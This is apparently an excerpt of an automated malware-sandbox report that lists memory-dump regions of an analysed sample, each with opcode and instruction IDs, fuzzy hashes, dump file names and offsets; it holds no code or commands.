                                                              • Instruction ID: a63b5f4f28c0ed6acf91d65d9d585d33641d1ed6fbc0322e878cfb0737645e66
                                                              • Opcode Fuzzy Hash: 7e198426b26b1f13cf5b3d1ef3a84635a0f70c114cba5c3927e2065ba7c4ef5c
                                                              • Instruction Fuzzy Hash: 42214D71F002149FCF14DFA995986ADBBF2FB9C312B04406AE906E7340DB349D819FA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b210f83f8c010d4956edbf0f6ddbde5e962f7bc41de4f8b76da4e03e48f13e0d
                                                              • Instruction ID: 8b75f24990626e500c576fef7e00e7640508bb0eb52ab8aef48691c2fb19b013
                                                              • Opcode Fuzzy Hash: b210f83f8c010d4956edbf0f6ddbde5e962f7bc41de4f8b76da4e03e48f13e0d
                                                              • Instruction Fuzzy Hash: 73318134D002498FDB01EFA4D851AEEBBB2FF88300F108265D001AB365EA745A46DF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c7d5853af2e7202c36fd80900b81d70038287ea1f4685570cdf483338a4d9d65
                                                              • Instruction ID: fe332b1bcf79bf2fef5c2e86dcd13182953479005e54d9dac416dce90dd0ca93
                                                              • Opcode Fuzzy Hash: c7d5853af2e7202c36fd80900b81d70038287ea1f4685570cdf483338a4d9d65
                                                              • Instruction Fuzzy Hash: E011AF71B00314AFDB04ABB9881836EBAEEEFC9750B24452DD40AD7741DEB88D4187E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c66a63289c25ff975b6f26da390574a7974abbd93da235d60b8a7584f4cca12
                                                              • Instruction ID: f5d1a5ef10a145d76606148e1a139f801ff2564c30d3d452c9257850ad0626a5
                                                              • Opcode Fuzzy Hash: 3c66a63289c25ff975b6f26da390574a7974abbd93da235d60b8a7584f4cca12
                                                              • Instruction Fuzzy Hash: 2221D171B002049FCB14DF68D959AADBBF6FBCD311B10806AE906E7351DB719D81DBA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e0a87d00fef0e4acc013b59e57c83d9f2678603014e4251d4c7f53fac35ccfa
                                                              • Instruction ID: ea93797aeff580be3d57c5b5583171511accf5f2ea75dfe3cffcf212566fd1cf
                                                              • Opcode Fuzzy Hash: 3e0a87d00fef0e4acc013b59e57c83d9f2678603014e4251d4c7f53fac35ccfa
                                                              • Instruction Fuzzy Hash: 52F0F934A046089FC715EF7DE940AB9BBF5FB89304B1041A9D80AC3664FB31AD56FB51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ddbc5c545098095e0f61c365fc7405c72d0407f5f8705e27a63be0949dd95409
                                                              • Instruction ID: d3503f07a6c3423543b253f0d66b0eb252fc8184f2171fdc6e9f38916100dffd
                                                              • Opcode Fuzzy Hash: ddbc5c545098095e0f61c365fc7405c72d0407f5f8705e27a63be0949dd95409
                                                              • Instruction Fuzzy Hash: A4E09A257051515F960522AD24726FE2BAB8EC76A5325006BE884DBB42CDA19CC3A3A1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 002a2b25001be337d52161259b69ed228648b911fa3e9affbd68c3f447a5d2eb
                                                              • Instruction ID: 61302e6f382cdebd04cae026f21b4d82a6f035c076e1601ea3ddaa98f4347f03
                                                              • Opcode Fuzzy Hash: 002a2b25001be337d52161259b69ed228648b911fa3e9affbd68c3f447a5d2eb
                                                              • Instruction Fuzzy Hash: FEF05E75E041144FCB509FBD58006EEBFF8DF8A354B1001BAD948E2606E231495287E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f901717921f4e0572fa72f0be5d86d1429b25eac0aa4e0b36ef7c3781855b77
                                                              • Instruction ID: 9dc72e2150e34816f7840c829d79ce39a0385095530f630d0ab3e00e022e9e9c
                                                              • Opcode Fuzzy Hash: 7f901717921f4e0572fa72f0be5d86d1429b25eac0aa4e0b36ef7c3781855b77
                                                              • Instruction Fuzzy Hash: 8DF05E78600744DFC744EF68E841F59BBB5EF48705B1086A5D408C7229EAB0EE4AAF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb00a1854482a50ba5dbf1570a4722687dae403731f1398e6d79c072da3abae5
                                                              • Instruction ID: ca118a111d8b7a0df4842cca6bf7f65d454ce4114d14bff5ed53b9d75b3f073e
                                                              • Opcode Fuzzy Hash: fb00a1854482a50ba5dbf1570a4722687dae403731f1398e6d79c072da3abae5
                                                              • Instruction Fuzzy Hash: 84E02B203045A00BC70667B864206FD3FAA9F8775470404EBD945DBB97DE10DC5797C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e639bed51b61ed34b0629765d6c818a2439914271f6f7573388a15119f8960ee
                                                              • Instruction ID: f5310d87f56a90051c3ed5bb48f4c1e3d8425fe2167ba375f3ea276d726a4d89
                                                              • Opcode Fuzzy Hash: e639bed51b61ed34b0629765d6c818a2439914271f6f7573388a15119f8960ee
                                                              • Instruction Fuzzy Hash: FDF03A34A107049FC741FFB8E841A5CBBB1AF49304B508B64C40487638EFB0EA8AAB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bdaf3c42170280fdbaae5e218974e8e438cf2e5fe16ce9c5491ddd7145390e38
                                                              • Instruction ID: cfdeac39340755cb3ade2dafa3ce31a833654c05af6d7413c87dcb09c85b938e
                                                              • Opcode Fuzzy Hash: bdaf3c42170280fdbaae5e218974e8e438cf2e5fe16ce9c5491ddd7145390e38
                                                              • Instruction Fuzzy Hash: BFF01235B042058BCF04FF64F4596BE7772EB84341B208916D80297798DF389C96A781
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d85411d4caf2fbe2d6b694f5e38b74cbae99381d9cd19682ab2ae951eeaa5cb
                                                              • Instruction ID: 5ba6b08650ab130e7ca99a0f2b8269ca9a06eae10fe6210217f3505111cffeac
                                                              • Opcode Fuzzy Hash: 2d85411d4caf2fbe2d6b694f5e38b74cbae99381d9cd19682ab2ae951eeaa5cb
                                                              • Instruction Fuzzy Hash: C6D0C225300215130A58319E30126AE229B8AC7661330002AE409EB301CDA0ACC273E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b971de66032f71f101e6c44bd0509e6df131a2e65838f457120d6eda4ccea78
                                                              • Instruction ID: 8ba4a10adaa8750324b67fdd88afb8464733846e0a047f6ad14554f305bb30fe
                                                              • Opcode Fuzzy Hash: 2b971de66032f71f101e6c44bd0509e6df131a2e65838f457120d6eda4ccea78
                                                              • Instruction Fuzzy Hash: 0DE0C2313042005FC348967EA88896FBBDAEFC927031504B9F109C7325DD70CC024390
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 400f7f2dc49970d086970d97a114ff19da7ddd1ecdaa733a53a7e85e207986a2
                                                              • Instruction ID: ec60eb1e0a0db6880900729f7dc6d8fa8f2a5348190a26ed7058243b5867dc01
                                                              • Opcode Fuzzy Hash: 400f7f2dc49970d086970d97a114ff19da7ddd1ecdaa733a53a7e85e207986a2
                                                              • Instruction Fuzzy Hash: 4BE0C23531053407CB0877ACA41067E36DEDBC9B54B00002ADA0AD7788EE60ED5367C5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d53718d2590d88ef18e57d1e8c065516f989a6cd6a55c649dc1fcfab47eb6394
                                                              • Instruction ID: 4a233801fc21895c7b1e49681ef6a95dad5e950a5a9866f7bfd1d960b7b56a63
                                                              • Opcode Fuzzy Hash: d53718d2590d88ef18e57d1e8c065516f989a6cd6a55c649dc1fcfab47eb6394
                                                              • Instruction Fuzzy Hash: 40E0DF30A0A284EFCB42DFA8D9509DDBBF1FF0A20470082EAE444CB252DB311E06DF81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 552b7846b54e4a58fceb2af7811ee3a707ff8ef31ef01f5048ee4d1b35c2499e
                                                              • Instruction ID: 2be7b868154f32e7c75a6054a9b1684eeaab9faf58af8f1409e24f6c45c067e6
                                                              • Opcode Fuzzy Hash: 552b7846b54e4a58fceb2af7811ee3a707ff8ef31ef01f5048ee4d1b35c2499e
                                                              • Instruction Fuzzy Hash: 5AE08C302192C1DAE71223ACA8393B8BF12BB82729F681077D4C2056678A5184C7A313
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0fdb45413ce815d6c7e8de704dc81ce9f237dfee23278a6489e51bef7f9ff70d
                                                              • Instruction ID: a2a5ff5a5d58f8a7baefd796be25e8d77524128adc81da629d2594971534494f
                                                              • Opcode Fuzzy Hash: 0fdb45413ce815d6c7e8de704dc81ce9f237dfee23278a6489e51bef7f9ff70d
                                                              • Instruction Fuzzy Hash: 3FD05B3090214CEFCB40DFA8E90159DB7F5DB48204B1081B9E408D3310DE715F059B91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10e4d9a55d1bda837bcb731963ade594bfb92f05eec85ada6bc64f5150dd3a9c
                                                              • Instruction ID: bfe07c5e0f482170fe75f92970244a278a41995757b6ede8878ef474f0c19175
                                                              • Opcode Fuzzy Hash: 10e4d9a55d1bda837bcb731963ade594bfb92f05eec85ada6bc64f5150dd3a9c
                                                              • Instruction Fuzzy Hash: 64D0A731F002048BCF00EA64F8153ED7761E784341F204421C80697788DF38DDA6A7C2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f56fda4388cab45bd75acb5558a60a66923602b5c35915237ffdb1fa4fdf9941
                                                              • Instruction ID: 70adb8012ddc82b0b9e3d72670f153530a04086228f402437b74b7198a552ba4
                                                              • Opcode Fuzzy Hash: f56fda4388cab45bd75acb5558a60a66923602b5c35915237ffdb1fa4fdf9941
                                                              • Instruction Fuzzy Hash: 71C012346146058BD215FF6DEC44E647765BB853043100158E80A87164EE11DC56FB61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d6fa3cb7b218e32ab98ae91073a41e9d71f30b26f68457b202216717ad21efa
                                                              • Instruction ID: 6a7c82be321d2655471d9d3ed660d90086dc20f0a0a8b3dd9f3ae9aba41a4091
                                                              • Opcode Fuzzy Hash: 7d6fa3cb7b218e32ab98ae91073a41e9d71f30b26f68457b202216717ad21efa
                                                              • Instruction Fuzzy Hash: 10C092514A8AC00BCB0AAB6C0BA61D92F30FC8364879A04D6D184892E7AE8C82076322
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1839faa81c4683b89ce94f0fd9bde63e68771649e0fad2c0214711cac16e674a
                                                              • Instruction ID: f1a12ab5bd0f2adb003dc46c159b49299e0bb3b8378f23443e2e64611b6b3b99
                                                              • Opcode Fuzzy Hash: 1839faa81c4683b89ce94f0fd9bde63e68771649e0fad2c0214711cac16e674a
                                                              • Instruction Fuzzy Hash: 4EC01230415288CAFB20BBE9DD2A3B8BA11B786705F300036A18300A628E9488C6A613
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9bfa69da48d94fcdf1608efafaac61a779ebb4d229136ef6ce0c0f00ab85ad7
                                                              • Instruction ID: 368066d452d061cd1fe1714186c271049948aa4624ff20769b0e280aec014979
                                                              • Opcode Fuzzy Hash: b9bfa69da48d94fcdf1608efafaac61a779ebb4d229136ef6ce0c0f00ab85ad7
                                                              • Instruction Fuzzy Hash: 0FC08C30405288CBF720BBE9DD2A3BCBF10BB86700F300032A983006628ED488C7A213
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V^m
                                                              • API String ID: 0-3751104571
                                                              • Opcode ID: b418c8bafc1aba37c344962097111e8b9ae08e7b30fe0dee86e5d6e35dbdd3b9
                                                              • Instruction ID: 535977b5821673c7ac6a2f0824238e1bbff3f4fd27fed6a5a55c04fcf143d6e6
                                                              • Opcode Fuzzy Hash: b418c8bafc1aba37c344962097111e8b9ae08e7b30fe0dee86e5d6e35dbdd3b9
                                                              • Instruction Fuzzy Hash: FB916D70E00709DFDF10CFA9C8817EDBBF2AF89314F248129E415AB294DB749986DB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ed1efb3f00fcd3d994e195bb9d397324ad060e5a6547a379ddae92f4c6a1e54
                                                              • Instruction ID: b78bd2d15e4f74a8c79667342de129a954bf6a7d60727fd930f20d278210ed3d
                                                              • Opcode Fuzzy Hash: 8ed1efb3f00fcd3d994e195bb9d397324ad060e5a6547a379ddae92f4c6a1e54
                                                              • Instruction Fuzzy Hash: 0212C8F042A7458BE330DF65E84E2993FB1BB45328F924609E2656F2E5EFB4114ACF44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity